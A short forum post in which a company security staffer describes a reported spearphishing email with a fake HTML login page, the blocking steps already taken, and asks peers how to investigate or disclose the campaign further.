June 8, 2021

An employee recieved a spearphishing email. Preventive measures have been taken, what now?

An employee at my company received a spearphishing email, but fortunately she reported it to us before submitting any credentials. Running internal phishing awareness campaigns works!

The email contained a classic html file with a fake login, the employee’s email was hard coded into the code, this was a targeted attack. Upon inspecting the file I found a domain from southwest Europe to which the credentials were supposed to be sent to, which had no reports anywhere so far. We suspect the server might be compromised or abandoned, since it hosts the website of a legitimate website. The domain was blocked nonetheless.

I have also identified the email server which sent the email and immediately blocked the IP addresses and email domains related to it. The company who owns the email domain has a website, and its DNS records show an IP address that has been reported several times as an address used for malware delivery.

I don’t have much experience with spearphishing yet. My company does not yet produce intelligence reports or bulletins, but I think I would like to do more about this campaign. What other steps should we take to further investigate or disclose this campaign? How do you guys handle spearphishing campaigns?

Leave a Reply

Your email address will not be published. Required fields are marked *

Note: By filling this form and submitting your commen, you acknowledge, agree and comply with our terms of service. In addition you acknowledge that you are willingly sharing your email address with AiOWikis and you might receive notification emails from AiOWikis for comment notifications. AiOWiksi guarantees that your email address WILL NOT be used for advertisement or email marketting purposes.

This site uses Akismet to reduce spam. Learn how your comment data is processed.